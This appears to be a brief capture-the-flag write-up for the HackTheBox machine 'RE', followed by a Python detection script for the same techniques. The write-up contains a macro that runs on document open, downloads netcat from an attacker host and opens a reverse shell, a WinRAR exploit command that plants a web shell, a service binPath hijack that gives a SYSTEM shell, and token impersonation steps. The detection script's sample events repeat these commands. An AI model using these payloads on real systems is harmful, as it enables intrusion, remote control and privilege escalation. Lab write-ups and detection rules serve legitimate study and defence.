RE @ HackTheBox
RE is a 40-point Windows machine on HackTheBox that involves uploading an ODS file with a malicious macro, abusing a WinRAR vulnerability, and using UsoSVC together with Metasploit’s incognito module to become root.
Notes
ODS Macro:
Sub Run_at_open
Shell("certutil.exe -urlcache -split -f 'http://<lhost>:8000/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe")
Shell("C:\Windows\System32\spool\drivers\color\nc.exe <lhost> 7000 -ecmd.exe")
End Sub
WinRAR:
python3 evilWinRAR.py -e xct_shell.aspx -p 'c:\inetpub\wwwroot\re\' -o xct.rar
UsoSVC:
sc config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe <lhost> 9000 -e cmd.exe"
sc stop usosvc
sc start usosvc
Incognito:
use incognito
list_tokens -u
impersonate_token RE\\coby
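Detection side of the notes above, as an added example that is not part of the original post: a small triage script that flags the command-line patterns these steps leave in process-creation logs (a certutil URL download, an executable under spool\drivers\color, and a service binPath change). The rule names, severity levels and sample events are constructed for illustration.

```python
import re

# Drop directory used in the notes; standard users can usually write to it.
DROP_DIR = r"c:\\windows\\system32\\spool\\drivers\\color\\"

# Rule names are made up for this example.
RULES = {
    "certutil_download": re.compile(r"\bcertutil(?:\.exe)?\s.*-urlcache\b.*https?://", re.I),
    "binary_in_color_dir": re.compile(DROP_DIR + r"[^\\\s\"']+\.exe", re.I),
    "service_binpath_change": re.compile(r"\bsc(?:\.exe)?\s+config\s+\S+\s+binpath\s*=", re.I),
}

def scan(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def severity(hits):
    """A binary in the drop directory plus a download or service change is high."""
    if "binary_in_color_dir" in hits and len(hits) > 1:
        return "high"
    return "medium" if hits else "none"

def triage(cmdlines):
    """Return (severity, hits, cmdline) for each command line that matched a rule."""
    out = []
    for line in cmdlines:
        hits = scan(line)
        if hits:
            out.append((severity(hits), hits, line))
    return out

# Constructed process-creation command lines (192.0.2.10 is a documentation address).
SAMPLE_EVENTS = [
    r"certutil.exe -urlcache -split -f 'http://192.0.2.10:8000/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe",
    r'sc config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 192.0.2.10 9000 -e cmd.exe"',
    r"sc config usosvc start= auto",
    r"certutil.exe -verify C:\certs\server.cer",
    r'sc config wuauserv binPath= "C:\Windows\system32\svchost.exe -k netsvcs -p"',
]

if __name__ == "__main__":
    for sev, hits, line in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {','.join(hits)}: {line}")
```

The same patterns can be fed from Sysmon Event ID 1 or Windows Security Event 4688 command-line fields.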
This post is licensed under CC BY 4.0 by the author.